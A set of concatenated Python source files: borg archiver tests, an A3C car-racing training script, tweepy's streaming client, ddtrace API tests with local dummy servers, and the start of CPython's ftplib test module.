b'1234', b'56'
], [
b'1234', b'565'
])
class TestBuildFilter:
@staticmethod
def peek_and_store_hardlink_masters(item, matched):
pass
def test_basic(self):
matcher = PatternMatcher()
matcher.add([parse_pattern('included')], IECommand.Include)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='included'))
assert filter(Item(path='included/file'))
assert not filter(Item(path='something else'))
def test_empty(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, 0)
assert filter(Item(path='anything'))
def test_strip_components(self):
matcher = PatternMatcher(fallback=True)
filter = Archiver.build_filter(matcher, self.peek_and_store_hardlink_masters, strip_components=1)
assert not filter(Item(path='shallow'))
assert not filter(Item(path='shallow/')) # can this even happen? paths are normalized...
assert filter(Item(path='deep enough/file'))
assert filter(Item(path='something/dir/file'))
class TestCommonOptions:
@staticmethod
def define_common_options(add_common_option):
add_common_option('-h', '--help', action='help', help='show this help message and exit')
add_common_option('--critical', dest='log_level', help='foo',
action='store_const', const='critical', default='warning')
add_common_option('--error', dest='log_level', help='foo',
action='store_const', const='error', default='warning')
add_common_option('--append', dest='append', help='foo',
action='append', metavar='TOPIC', default=[])
add_common_option('-p', '--progress', dest='progress', action='store_true', help='foo')
add_common_option('--lock-wait', dest='lock_wait', type=int, metavar='N', default=1,
help='(default: %(default)d).')
@pytest.fixture
def basic_parser(self):
parser = argparse.ArgumentParser(prog='test', description='test parser', add_help=False)
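        # common options may be given both before the subcommand (suffix '_level0') and after it
        # ('_level1'); CommonOptions.resolve() merges them, with later entries in
        # suffix_precedence taking precedence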
parser.common_options = Archiver.CommonOptions(self.define_common_options,
suffix_precedence=('_level0', '_level1'))
return parser
@pytest.fixture
def subparsers(self, basic_parser):
if sys.version_info >= (3, 7):
# py37 pre-release defaults to unwanted required=True, in 3.7.0+ it was fixed to =False
return basic_parser.add_subparsers(title='required arguments', metavar='<command>', required=False)
else:
# py36 does not support required=... argument (but behaves like required=False).
# note: use below call for 3.6 and 3.7 when there are no alphas/betas/RCs of 3.7.0 around any more.
return basic_parser.add_subparsers(title='required arguments', metavar='<command>')
@pytest.fixture
def parser(self, basic_parser):
basic_parser.common_options.add_common_group(basic_parser, '_level0', provide_defaults=True)
return basic_parser
@pytest.fixture
def common_parser(self, parser):
common_parser = argparse.ArgumentParser(add_help=False, prog='test')
parser.common_options.add_common_group(common_parser, '_level1')
return common_parser
@pytest.fixture
def parse_vars_from_line(self, parser, subparsers, common_parser):
subparser = subparsers.add_parser('subcommand', parents=[common_parser], add_help=False,
description='foo', epilog='bar', help='baz',
formatter_class=argparse.RawDescriptionHelpFormatter)
subparser.set_defaults(func=1234)
subparser.add_argument('--append-only', dest='append_only', action='store_true')
def parse_vars_from_line(*line):
print(line)
args = parser.parse_args(line)
parser.common_options.resolve(args)
return vars(args)
return parse_vars_from_line
def test_simple(self, parse_vars_from_line):
assert parse_vars_from_line('--error') == {
'append': [],
'lock_wait': 1,
'log_level': 'error',
'progress': False
}
assert parse_vars_from_line('--error', 'subcommand', '--critical') == {
'append': [],
'lock_wait': 1,
'log_level': 'critical',
'progress': False,
'append_only': False,
'func': 1234,
}
with pytest.raises(SystemExit):
parse_vars_from_line('--append-only', 'subcommand')
assert parse_vars_from_line('--append=foo', '--append', 'bar', 'subcommand', '--append', 'baz') == {
'append': ['foo', 'bar', 'baz'],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
@pytest.mark.parametrize('position', ('before', 'after', 'both'))
@pytest.mark.parametrize('flag,args_key,args_value', (
('-p', 'progress', True),
('--lock-wait=3', 'lock_wait', 3),
))
def test_flag_position_independence(self, parse_vars_from_line, position, flag, args_key, args_value):
line = []
if position in ('before', 'both'):
line.append(flag)
line.append('subcommand')
if position in ('after', 'both'):
line.append(flag)
result = {
'append': [],
'lock_wait': 1,
'log_level': 'warning',
'progress': False,
'append_only': False,
'func': 1234,
}
result[args_key] = args_value
assert parse_vars_from_line(*line) == result
def test_parse_storage_quota():
assert parse_storage_quota('50M') == 50 * 1000**2
with pytest.raises(argparse.ArgumentTypeError):
parse_storage_quota('5M')
def get_all_parsers():
"""
Return dict mapping command to parser.
"""
parser = Archiver(prog='borg').build_parser()
borgfs_parser = Archiver(prog='borgfs').build_parser()
parsers = {}
def discover_level(prefix, parser, Archiver, extra_choices=None):
choices = {}
for action in parser._actions:
if action.choices is not None and 'SubParsersAction' in str(action.__class__):
for cmd, parser in action.choices.items():
choices[prefix + cmd] = parser
if extra_choices is not None:
choices.update(extra_choices)
if prefix and not choices:
return
for command, parser in sorted(choices.items()):
discover_level(command + " ", parser, Archiver)
parsers[command] = parser
discover_level("", parser, Archiver, {'borgfs': borgfs_parser})
return parsers
@pytest.mark.parametrize('command, parser', list(get_all_parsers().items()))
def test_help_formatting(command, parser):
if isinstance(parser.epilog, RstToTextLazy):
assert parser.epilog.rst
@pytest.mark.parametrize('topic, helptext', list(Archiver.helptext.items()))
def test_help_formatting_helptexts(topic, helptext):
assert str(rst_to_terminal(helptext))
|
trainer.py
|
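# NOTE: this import preamble is an assumption -- the original file does not show its imports.
# The standard-library and torch imports below are what the code in this file uses; the
# project-local names (Agent, Runner, logger) and the gym video Monitor come from modules whose
# exact paths are not shown here, so they are left as hypothetical, commented-out imports.
import itertools
import time
import traceback
from collections import deque

import torch
import torch.multiprocessing as mp  # assumed: torch.multiprocessing, needed alongside share_memory()
import torch.nn.functional as F
from torch import optim

# from gym.wrappers import Monitor       # hypothetical import path
# from .agent import Agent               # hypothetical import path
# from .runner import Runner             # hypothetical import path
# import logging; logger = logging.getLogger(__name__)  # hypothetical logger setup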
class Trainer:
def __init__(self, gamma, agent, window = 15, workers = 8, **kwargs):
super().__init__(**kwargs)
self.agent = agent
self.window = window
self.gamma = gamma
self.optimizer = optim.Adam(self.agent.parameters(), lr=1e-4)
self.workers = workers
        # even though we load the weights into the worker agents explicitly, I found that without
        # also sharing the main agent's memory as follows, the algorithm was not converging:
self.agent.share_memory()
def fit(self, episodes = 1000):
"""
        The higher-level method for training the agents.
        It calls into the lower-level "train" method, which orchestrates the process itself.
"""
last_update = 0
updates = dict()
for ix in range(1, self.workers + 1):
updates[ ix ] = { 'episode': 0, 'step': 0, 'rewards': deque(), 'losses': deque(), 'points': 0, 'mean_reward': 0, 'mean_loss': 0 }
for update in self.train(episodes):
now = time.time()
            # you could do something useful here with the updates dict. I've opted not to, since
            # I'm using logging anyway and got more value out of watching the log file and
            # grepping for the desired values.
# save the current model's weights every minute:
if now - last_update > 60:
torch.save(self.agent.state_dict(), './checkpoints/car-racing/' + str(int(now)) + '-.pytorch')
last_update = now
def train(self, episodes = 1000):
"""
Lower level training orchestration method. Written in the generator style. Intended to be used with "for update in train(...):"
"""
# create the requested number of background agents and runners:
worker_agents = self.agent.clone(num = self.workers)
runners = [ Runner(agent=agent, ix = ix + 1, train = True) for ix, agent in enumerate(worker_agents) ]
# we're going to communicate the workers' updates via the thread safe queue:
queue = mp.SimpleQueue()
        # if we've not been given a number of episodes, assume the process will be interrupted
        # with a keyboard interrupt once the user decides to stop it:
if episodes is None:
print('Starting out an infinite training process')
# create the actual background processes, making their entry be the train_one method:
processes = [ mp.Process(target=self.train_one, args=(runners[ix - 1], queue, episodes, ix)) for ix in range(1, self.workers + 1) ]
# run those processes:
for process in processes:
process.start()
try:
# what follows is a rather naive implementation of listening to workers updates. it works though for our purposes:
while any([ process.is_alive() for process in processes ]):
results = queue.get()
yield results
except Exception as e:
logger.error(str(e))
def train_one(self, runner, queue, episodes = 1000, ix = 1):
"""
Orchestrate the training for a single worker runner and agent. This is intended to run in its own background process.
"""
        # a possibly naive way of trying to further de-correlate the workers' weight updates
        # (I have no hard evidence that it works, other than my subjective observation):
time.sleep(ix)
try:
            # we are going to request that the episode be reset whenever the agent scores lower
            # than its previous best; the same happens if its total drops below -10 points:
max_points = 0
max_eval_points = 0
min_points = 0
max_episode = 0
for episode_ix in itertools.count(start=0, step=1):
if episodes is not None and episode_ix >= episodes:
return
max_episode_points = 0
points = 0
# load up the newest weights every new episode:
runner.load_state_dict(self.agent.state_dict())
# every 5 episodes lets evaluate the weights we've learned so far by recording the run of the car using the greedy strategy:
if ix == 1 and episode_ix % 5 == 0:
eval_points = self.record_greedy(episode_ix)
if eval_points > max_eval_points:
torch.save(runner.agent.state_dict(), './checkpoints/car-racing/' + str(eval_points) + '-eval-points.pytorch')
max_eval_points = eval_points
# each n-step window, compute the gradients and apply
# also: decide if we shouldn't restart the episode if we don't want to explore too much of the not-useful state space:
for step, rewards, values, policies, action_ixs, terminal in runner.run_episode(yield_every=self.window):
points += sum(rewards)
if ix == 1 and points > max_points:
torch.save(runner.agent.state_dict(), './checkpoints/car-racing/' + str(points) + '-points.pytorch')
max_points = points
if ix == 1 and episode_ix > max_episode:
torch.save(runner.agent.state_dict(), './checkpoints/car-racing/' + str(episode_ix) + '-episode.pytorch')
max_episode = episode_ix
if points < -10 or (max_episode_points > min_points and points < min_points):
terminal = True
max_episode_points = 0
                        points = 0
runner.ask_reset()
if terminal:
logger.info('TERMINAL for ' + str(ix) + ' at step ' + str(step) + ' with total points ' + str(points) + ' max: ' + str(max_episode_points) )
# if we're learning, then compute and apply the gradients and load the newest weights:
if runner.train:
loss = self.apply_gradients(policies, action_ixs, rewards, values, terminal, runner)
runner.load_state_dict(self.agent.state_dict())
max_episode_points = max(max_episode_points, points)
min_points = max(min_points, points)
# communicate the gathered values to the main process:
queue.put((ix, episode_ix, step, rewards, loss, points, terminal))
except Exception as e:
string = traceback.format_exc()
logger.error(str(e) + ' → ' + string)
queue.put((ix, -1, -1, [-1], -1, str(e) + '<br />' + string, True))
def record_greedy(self, episode_ix):
"""
Records the video of the "greedy" run based on the current weights.
"""
directory = './videos/car-racing/episode-' + str(episode_ix) + '-' + str(int(time.time()))
player = Player(agent=self.agent, directory=directory, train=False)
points = player.play()
logger.info('Evaluation at episode ' + str(episode_ix) + ': ' + str(points) + ' points (' + directory + ')')
return points
def apply_gradients(self, policies, actions, rewards, values, terminal, runner):
worker_agent = runner.agent
actions_one_hot = torch.tensor([[ int(i == action) for i in range(4) ] for action in actions], dtype=torch.float32)
policies = torch.stack(policies)
values = torch.cat(values)
values_nograd = torch.zeros_like(values.detach(), requires_grad=False)
values_nograd.copy_(values)
discounted_rewards = self.discount_rewards(runner, rewards, values_nograd[-1], terminal)
advantages = discounted_rewards - values_nograd
        logger.info('Runner ' + str(runner.ix) + ' Rewards: ' + str(rewards))
        logger.info('Runner ' + str(runner.ix) + ' Discounted Rewards: ' + str(discounted_rewards.numpy()))
log_policies = torch.log(0.00000001 + policies)
one_log_policies = torch.sum(log_policies * actions_one_hot, dim=1)
entropy = torch.sum(policies * -log_policies)
policy_loss = -torch.mean(one_log_policies * advantages)
value_loss = F.mse_loss(values, discounted_rewards)
value_loss_nograd = torch.zeros_like(value_loss)
value_loss_nograd.copy_(value_loss)
policy_loss_nograd = torch.zeros_like(policy_loss)
policy_loss_nograd.copy_(policy_loss)
logger.info('Value Loss: ' + str(float(value_loss_nograd)) + ' Policy Loss: ' + str(float(policy_loss_nograd)))
loss = policy_loss + 0.5 * value_loss - 0.01 * entropy
self.agent.zero_grad()
loss.backward()
torch.nn.utils.clip_grad_norm_(worker_agent.parameters(), 40)
        # the following step is crucial: at this point, all the information about the gradients resides in the worker agent's memory. We need to "move" those gradients into the main agent's memory:
self.share_gradients(worker_agent)
# update the weights with the computed gradients:
self.optimizer.step()
worker_agent.zero_grad()
return float(loss.detach())
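    # Copy each worker parameter's gradient onto the corresponding shared parameter.
    # If the shared agent already holds gradients, bail out and keep them (the usual
    # "ensure shared grads" pattern seen in A3C implementations).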
def share_gradients(self, worker_agent):
for param, shared_param in zip(worker_agent.parameters(), self.agent.parameters()):
if shared_param.grad is not None:
return
shared_param._grad = param.grad
def clip_reward(self, reward):
"""
Clips the rewards into the <-3, 3> range preventing too big of the gradients variance.
"""
return max(min(reward, 3), -3)
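    # Compute the discounted n-step returns for the window: each position accumulates its own
    # clipped reward plus the gamma-discounted rewards that follow it, and when the window does
    # not end the episode the critic's current value estimate is appended as a bootstrap
    # (note the last_value argument is effectively unused; the bootstrap comes from runner.get_value()).
    # For example, with gamma = 0.99 and clipped rewards [1, 0, 2] on a terminal window, the
    # returns are [1 + 0.99 * 0 + 0.99**2 * 2, 0 + 0.99 * 2, 2].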
def discount_rewards(self, runner, rewards, last_value, terminal):
discounted_rewards = [0 for _ in rewards]
loop_rewards = [ self.clip_reward(reward) for reward in rewards ]
if terminal:
loop_rewards.append(0)
else:
loop_rewards.append(runner.get_value())
for main_ix in range(len(discounted_rewards) - 1, -1, -1):
for inside_ix in range(len(loop_rewards) - 1, -1, -1):
if inside_ix >= main_ix:
reward = loop_rewards[inside_ix]
discounted_rewards[main_ix] += self.gamma**(inside_ix - main_ix) * reward
return torch.tensor(discounted_rewards)
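# A Runner whose environment is wrapped in a Monitor (presumably gym's video-recording
# wrapper) so that a single greedy evaluation episode can be rendered and saved to disk.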
class Player(Runner):
def __init__(self, directory, **kwargs):
super().__init__(ix=999, **kwargs)
self.env = Monitor(self.env, directory)
def play(self):
points = 0
for step, rewards, values, policies, actions, terminal in self.run_episode(yield_every = 1, do_render = True):
points += sum(rewards)
self.env.close()
return points
if __name__ == "__main__":
agent = Agent()
trainer = Trainer(gamma = 0.99, agent = agent)
trainer.fit(episodes=None)
|
streaming.py
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
import httplib
from socket import timeout
from threading import Thread
from time import sleep
import urllib
import zlib
from tweepy import __version__
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = 1
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_data(self, data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, json.loads(data))
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = json.loads(data)['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'limit' in data:
if self.on_limit(json.loads(data)['limit']['track']) is False:
return False
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_limit(self, track):
"""Called when a limitation notice arrvies"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
self.retry_time = options.get("retry_time", 10.0)
self.snooze_time = options.get("snooze_time", 5.0)
self.buffer_size = options.get("buffer_size", 1500)
self.use_gzip = options.get("gzip", False)
if options.get("secure", True):
self.scheme = "https"
else:
self.scheme = "http"
self.api = API()
self.headers = options.get("headers") or {}
if self.use_gzip:
self.headers['Accept-Encoding'] = 'deflate, gzip'
self.headers['User-Agent'] = 'Tweepy v%s' % __version__
self.parameters = None
self.body = None
def _run(self):
# Authenticate
url = "%s://%s%s" % (self.scheme, self.host, self.url)
# Connect and process the stream
error_counter = 0
conn = None
exception = None
while self.running:
if self.retry_count is not None and error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
if self.scheme == "http":
conn = httplib.HTTPConnection(self.host)
else:
conn = httplib.HTTPSConnection(self.host)
self.auth.apply_auth(url, 'POST', self.headers, self.parameters)
conn.connect()
conn.sock.settimeout(self.timeout)
conn.request('POST', self.url, self.body, headers=self.headers)
resp = conn.getresponse()
if resp.status != 200:
if self.listener.on_error(resp.status) is False:
break
error_counter += 1
sleep(self.retry_time)
else:
error_counter = 0
if self.use_gzip:
self._read_gzip_loop(resp)
else:
self._read_loop(resp)
except timeout:
if self.listener.on_timeout() == False:
break
if self.running is False:
break
conn.close()
sleep(self.snooze_time)
except Exception, exception:
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if conn:
conn.close()
if exception:
raise
def _read_gzip_loop(self, resp):
decompressor = zlib.decompressobj(16 + zlib.MAX_WBITS)
data = ''
lines = []
while self.running:
if resp.isclosed():
break
buf = decompressor.decompress(resp.read(self.buffer_size))
for c in buf:
if c == '\n':
lines.append(data.strip())
data = ''
else:
data += c
if len(lines) > 0:
for line in lines:
if self.listener.on_data(line) is False:
self.running = False
del lines[:]
def _read_loop(self, resp):
while self.running:
if resp.isclosed():
break
# read length
data = ''
while True:
c = resp.read(1)
if not c or c == '\n':
break
data += c
data = data.strip()
# read data and pass into listener
if self.listener.on_data(data) is False:
self.running = False
def _start(self, async):
self.running = True
if async:
Thread(target=self._run).start()
else:
self._run()
def userstream(self, count=None, async=False, secure=True):
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/2/user.json'
self.host='userstream.twitter.com'
if count:
self.url += '&count=%s' % count
self._start(async)
def firehose(self, count=None, async=False):
self.parameters = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/firehose.json?delimited=length' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.parameters = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/retweet.json?delimited=length' % STREAM_VERSION
self._start(async)
def sample(self, count=None, async=False):
self.parameters = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/sample.json?delimited=length' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None, count = None):
self.parameters = {}
self.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%i/statuses/filter.json?delimited=length' % STREAM_VERSION
if follow:
self.parameters['follow'] = ','.join(map(str, follow))
if track:
self.parameters['track'] = ','.join(map(str, track))
if locations and len(locations) > 0:
assert len(locations) % 4 == 0
self.parameters['locations'] = ','.join(['%.2f' % l for l in locations])
if count:
self.parameters['count'] = count
self.body = urllib.urlencode(self.parameters)
self.parameters['delimited'] = 'length'
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
test_api.py
|
import mock
import re
import socket
import threading
import time
import warnings
from unittest import TestCase
import pytest
from ddtrace.api import API, Response
from ddtrace.compat import iteritems, httplib, PY3
from ddtrace.internal.runtime.container import CGroupInfo
from ddtrace.vendor.six.moves import BaseHTTPServer, socketserver
class _BaseHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
error_message_format = '%(message)s\n'
error_content_type = 'text/plain'
@staticmethod
def log_message(format, *args): # noqa: A002
pass
class _APIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
self.send_error(200, 'OK')
class _TimeoutAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
# This server sleeps longer than our timeout
time.sleep(5)
class _ResetAPIEndpointRequestHandlerTest(_BaseHTTPRequestHandler):
def do_PUT(self):
return
_HOST = '0.0.0.0'
_TIMEOUT_PORT = 8743
_RESET_PORT = _TIMEOUT_PORT + 1
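# HTTP server bound to a Unix domain socket instead of a TCP port, used to exercise the
# UDS transport in the tests below.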
class UDSHTTPServer(socketserver.UnixStreamServer, BaseHTTPServer.HTTPServer):
def server_bind(self):
BaseHTTPServer.HTTPServer.server_bind(self)
def _make_uds_server(path, request_handler):
server = UDSHTTPServer(path, request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture
def endpoint_uds_server(tmp_path):
server, thread = _make_uds_server(str(tmp_path / 'uds_server_socket'), _APIEndpointRequestHandlerTest)
try:
yield server
finally:
server.shutdown()
thread.join()
def _make_server(port, request_handler):
server = BaseHTTPServer.HTTPServer((_HOST, port), request_handler)
t = threading.Thread(target=server.serve_forever)
# Set daemon just in case something fails
t.daemon = True
t.start()
return server, t
@pytest.fixture(scope='module')
def endpoint_test_timeout_server():
server, thread = _make_server(_TIMEOUT_PORT, _TimeoutAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
@pytest.fixture(scope='module')
def endpoint_test_reset_server():
server, thread = _make_server(_RESET_PORT, _ResetAPIEndpointRequestHandlerTest)
try:
yield thread
finally:
server.shutdown()
thread.join()
class ResponseMock:
def __init__(self, content, status=200):
self.status = status
self.content = content
def read(self):
return self.content
def test_api_str():
api = API('localhost', 8126, https=True)
assert str(api) == 'https://localhost:8126'
api = API('localhost', 8126, '/path/to/uds')
assert str(api) == 'unix:///path/to/uds'
class APITests(TestCase):
def setUp(self):
# DEV: Mock here instead of in tests, before we have patched `httplib.HTTPConnection`
self.conn = mock.MagicMock(spec=httplib.HTTPConnection)
self.api = API('localhost', 8126)
def tearDown(self):
del self.api
del self.conn
def test_typecast_port(self):
api = API('localhost', u'8126')
self.assertEqual(api.port, 8126)
@mock.patch('logging.Logger.debug')
def test_parse_response_json(self, log):
test_cases = {
'OK': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'OK\n': dict(
js=None,
log='Cannot parse Datadog Agent response, please make sure your Datadog Agent is up to date',
),
'error:unsupported-endpoint': dict(
js=None,
log='Unable to parse Datadog Agent JSON response: .*? \'error:unsupported-endpoint\'',
),
42: dict( # int as key to trigger TypeError
js=None,
log='Unable to parse Datadog Agent JSON response: .*? 42',
),
'{}': dict(js={}),
'[]': dict(js=[]),
# Priority sampling "rate_by_service" response
('{"rate_by_service": '
'{"service:,env:":0.5, "service:mcnulty,env:test":0.9, "service:postgres,env:test":0.6}}'): dict(
js=dict(
rate_by_service={
'service:,env:': 0.5,
'service:mcnulty,env:test': 0.9,
'service:postgres,env:test': 0.6,
},
),
),
' [4,2,1] ': dict(js=[4, 2, 1]),
}
for k, v in iteritems(test_cases):
log.reset_mock()
r = Response.from_http_response(ResponseMock(k))
js = r.get_json()
assert v['js'] == js
if 'log' in v:
log.assert_called_once()
msg = log.call_args[0][0] % log.call_args[0][1:]
assert re.match(v['log'], msg), msg
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close(self, HTTPConnection):
"""
When calling API._put
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
with warnings.catch_warnings(record=True) as w:
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
@mock.patch('ddtrace.compat.httplib.HTTPConnection')
def test_put_connection_close_exception(self, HTTPConnection):
"""
When calling API._put raises an exception
we close the HTTPConnection we create
"""
HTTPConnection.return_value = self.conn
# Ensure calling `request` raises an exception
self.conn.request.side_effect = Exception
with warnings.catch_warnings(record=True) as w:
with self.assertRaises(Exception):
self.api._put('/test', '<test data>', 1)
self.assertEqual(len(w), 0, 'Test raised unexpected warnings: {0!r}'.format(w))
self.conn.request.assert_called_once()
self.conn.close.assert_called_once()
def test_https():
conn = mock.MagicMock(spec=httplib.HTTPSConnection)
api = API('localhost', 8126, https=True)
with mock.patch('ddtrace.compat.httplib.HTTPSConnection') as HTTPSConnection:
HTTPSConnection.return_value = conn
api._put('/test', '<test data>', 1)
conn.request.assert_called_once()
conn.close.assert_called_once()
def test_flush_connection_timeout_connect():
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019)
response = api._flush(payload)
if PY3:
assert isinstance(response, (OSError, ConnectionRefusedError)) # noqa: F821
else:
assert isinstance(response, socket.error)
assert response.errno in (99, 111)
def test_flush_connection_timeout(endpoint_test_timeout_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _TIMEOUT_PORT)
response = api._flush(payload)
assert isinstance(response, socket.timeout)
def test_flush_connection_reset(endpoint_test_reset_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, _RESET_PORT)
response = api._flush(payload)
if PY3:
assert isinstance(response, (httplib.BadStatusLine, ConnectionResetError)) # noqa: F821
else:
assert isinstance(response, httplib.BadStatusLine)
def test_flush_connection_uds(endpoint_uds_server):
payload = mock.Mock()
payload.get_payload.return_value = 'foobar'
payload.length = 12
api = API(_HOST, 2019, uds_path=endpoint_uds_server.server_address)
response = api._flush(payload)
assert response.status == 200
@mock.patch('ddtrace.internal.runtime.container.get_container_info')
def test_api_container_info(get_container_info):
# When we have container information
# DEV: `get_container_info` will return a `CGroupInfo` with a `container_id` or `None`
info = CGroupInfo(container_id='test-container-id')
get_container_info.return_value = info
api = API(_HOST, 8126)
assert api._container_info is info
assert api._headers['Datadog-Container-Id'] == 'test-container-id'
# When we do not have container information
get_container_info.return_value = None
api = API(_HOST, 8126)
assert api._container_info is None
assert 'Datadog-Container-Id' not in api._headers
|
test_ftplib.py
|
"""Test script for ftplib module."""
# Modified by Giampaolo Rodola' to test FTP class, IPv6 and TLS
# environment
import ftplib
import asyncore
import asynchat
import socket
import StringIO
import errno
import os
try:
import ssl
except ImportError:
ssl = None
from unittest import TestCase
from test import test_support
from test.test_support import HOST
threading = test_support.import_module('threading')
# the dummy data returned by server over the data channel when
# RETR, LIST and NLST commands are issued
RETR_DATA = 'abcde12345\r\n' * 1000
LIST_DATA = 'foo\r\nbar\r\n'
NLST_DATA = 'foo\r\nbar\r\n'
class DummyDTPHandler(asynchat.async_chat):
dtp_conn_closed = False
def __init__(self, conn, baseclass):
asynchat.async_chat.__init__(self, conn)
self.baseclass = baseclass
self.baseclass.last_received_data = ''
def handle_read(self):
self.baseclass.last_received_data += self.recv(1024)
def handle_close(self):
# XXX: this method can be called many times in a row for a single
# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def handle_error(self):
raise
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn):
asynchat.async_chat.__init__(self, conn)
self.set_terminator("\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.rest = None
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = ''.join(self.in_buffer)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise
def push(self, data):
asynchat.async_chat.push(self, data + '\r\n')
def cmd_port(self, arg):
addr = map(int, arg.split(','))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
sock = socket.socket()
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ',')
p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=10)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
sock = socket.socket(socket.AF_INET6)
sock.bind((self.socket.getsockname()[0], 0))
sock.listen(5)
sock.settimeout(10)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(RETR_DATA[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
